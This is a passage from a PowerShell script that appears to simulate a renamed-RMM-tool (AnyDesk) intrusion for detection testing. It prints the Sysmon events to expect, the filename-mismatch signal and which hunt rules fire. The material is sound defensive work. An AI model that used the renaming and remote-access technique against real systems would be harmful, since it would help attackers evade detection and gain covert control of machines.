Write-Host "  EID 11: $CampaignName.exe written to Downloads (Image=powershell.exe, not a browser)" -ForegroundColor DarkYellow
Write-Host "  EID 1:  Image=$CampaignName.exe with the OriginalFilename printed in Step 1 (the mismatch signal)" -ForegroundColor DarkGreen
Write-Host "  EID 3:  powershell.exe to $RmmHost`:$RmmPort (not from the renamed binary)" -ForegroundColor DarkYellow
Write-Host ""
Write-Host "  [Hunt]      EID 11 + EID 1 within 5 min fires only if the rule does not require a browser writer" -ForegroundColor DarkYellow
Write-Host "  [Research]/[Analyst] rules keyed on RMM names or RMM OriginalFilename do not fire on notepad" -ForegroundColor DarkGray
Write-Host "Higher fidelity: replace source binary with actual AnyDesk.exe for real metadata" -ForegroundColor DarkGray
Write-Host "  OriginalFilename=AnyDesk.exe vs. CurrentName=$CampaignName.exe is the key signal" -ForegroundColor DarkGray
Write-Host ""

OSINT Pivots